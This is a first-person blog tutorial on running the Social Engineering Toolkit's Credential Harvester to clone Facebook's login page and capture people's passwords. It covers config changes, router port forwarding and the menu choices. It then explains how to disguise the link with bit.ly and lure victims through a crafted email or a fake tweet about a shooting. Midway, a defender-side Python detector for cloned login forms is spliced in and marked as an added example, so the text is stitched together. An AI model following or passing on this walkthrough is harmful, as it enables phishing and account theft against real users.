I realize there are many tutorials already written online for how to use the Social Engineering Toolkit (SET), including one really good one over at Metasploit Unleashed that covers all of the basics.
However, I find that I generally mess around with this tool only a couple of times a year, when it gets a major update or I want to try some new attack vectors. Unfortunately, when I use it that infrequently, it means that I basically have to re-learn everything all over again. Therefore, I've decided to log everything here so next time I feel like I really need it, I know I can come back to reference this.
My goal here was to create an attack that would allow me to trick someone into sending me their login and password for Facebook. The general idea behind this attack is that SET will clone the target website (in this case, http://www.facebook.com) and host it on your personal computer. The trick then is to convince someone to visit a link you crafted that points to your fake Facebook clone and get them to log in with their credentials (displaying it in Metasploit). Once they send you their credentials, the server you are hosting points the victim back to the real Facebook login page and (hopefully) they never know what happened.
For this exercise I used Backtrack 4 R2 and the latest version of SET (updated 4/15/2011) over a regular home network with a NETGEAR WGR614v8 wireless router.
While it seems like this would be a relatively straightforward process using the easily navigated SET menu structure, there are a few things that needed to be modified first. First and foremost, most people running SET are not connected directly to the open Internet. Therefore, the SET configurations must be modified to not attempt to auto-detect your IP address. To do this, navigate to the SET directory and modify the set_config file using your favorite text editor. In this instance, I'm using gedit.
# cd /pentest/exploits/SET/config
# gedit set_config
Find the line that by default reads AUTO_DETECT=ON, change it to read AUTO_DETECT=OFF, and save and close the document. This will cause SET to prompt you for your external IP address when you launch the Credential Harvester, which you can find by going to www.whatismyip.com.
Next, we need to set up the router for port forwarding so people from the outside Internet can connect to the fake web server. In order to do this with my particular router, you must first navigate to http://192.168.1.1 and log in to the control panel. From there, scroll down to Port Forwarding/Port Triggering on the left-hand side. Then add a custom service that forwards traffic on Port 80 (TCP/UDP) to your local IP address (in my case, 192.168.1.4).
Now that our configurations are ready, the next step is to open SET. Either go to Start->Backtrack->Penetration->Social Engineering Toolkit->Social Engineering Toolkit or run the following from the command line:
# cd /pentest/exploits/SET/
# python set
That launches the following screen:
[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by: David Kennedy (ReL1K) [---]
[---] Development Team: Thomas Werth [---]
[---] Version: 1.3.4 [---]
[---] Codename: 'Artillery Edition' [---]
[---] Report bugs to: firstname.lastname@example.org [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Framework: http://www.social-engineer.org [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit
Enter your choice:
From there, select option 2. Website Attack Vectors. Then you will see the following options:
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu
Enter your choice (press enter for default):
Select option 3. Credential Harvester Attack Method
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu
Enter number (1-4):
Select option 2. Site Cloner
This option is used for what IP the server will POST to.
If your using an external IP, use your external IP for this.
Enter the IP address for the POST back in Harvester/Tabnabbing:
Here you input your external IP address. Again, this can be found by going to www.whatismyip.com.
Enter the url to clone:
Here you put in the site you want to clone. In this instance, http://www.facebook.com. SET will then clone the site you input. Press return to progress past the message that mentions username and password form fields.
The server is now up and running. Anyone who now navigates to your external IP address will be presented with the fake Facebook login page you have cloned. Once they input their login credentials they will show up in your terminal and the victim will be forwarded to the real Facebook site.
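A defender-side check for the behaviour just described (a cloned login page served from a bare IP whose login form posts credentials back to that IP). This is an added example, not code from this post or from SET; the HTML samples are constructed and 203.0.113.5 is a documentation-range placeholder, not a real harvester.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

class _PasswordFormCollector(HTMLParser):
    # Records the action of every <form> that contains a password field.
    def __init__(self):
        super().__init__()
        self._form = None
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "pw": False}
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form["pw"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form:
            if self._form["pw"]:
                self.actions.append(self._form["action"])
            self._form = None

def suspicious_login_forms(html, page_host):
    # page_host is the host the browser loaded the page from. A harvester page
    # is served from a bare IP and its login form posts back to that IP.
    findings = []
    if _is_ip(page_host):
        findings.append(f"page served from bare IP {page_host}")
    parser = _PasswordFormCollector()
    parser.feed(html)
    for action in parser.actions:
        target = urlparse(action).hostname or page_host  # relative action = same host
        if _is_ip(target):
            findings.append(f"login form posts to bare IP {target}")
        elif target != page_host and not target.endswith("." + page_host):
            findings.append(f"login form posts off-site to {target}")
    return findings

# Constructed samples (not captured from SET): a clone posting to a placeholder IP, and a same-origin form.
CLONED_HTML = '<form action="http://203.0.113.5/" method="post"><input type="password" name="pass"></form>'
LEGIT_HTML = '<form action="/login.php" method="post"><input type="password" name="pass"></form>'
```

Run it against the HTML a browser or proxy actually fetched, with the host from the address bar; a login form that posts to a bare IP or to a host other than the one the page came from is the signature this kind of clone leaves.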
Now, obviously most people will not click on a link that looks like a random IP address. However, there are multiple ways to disguise that link. My favorite is converting the IP address into a bit.ly link. To do this, copy your external IP address and go to http://bit.ly/. Paste the external IP address and click the 'shorten' button. This will convert the link to something like http://bit.ly/900913, which looks a bit more friendly than a raw IP address. Then you can feel free to add it to a specially crafted email sent to your victim, or cast a wider fishnet and post a Tweet like:
@Phisherman123: Shooting at Fells Point Pirate Festival http://bit.ly/ysqb.
...and see who tries to log in!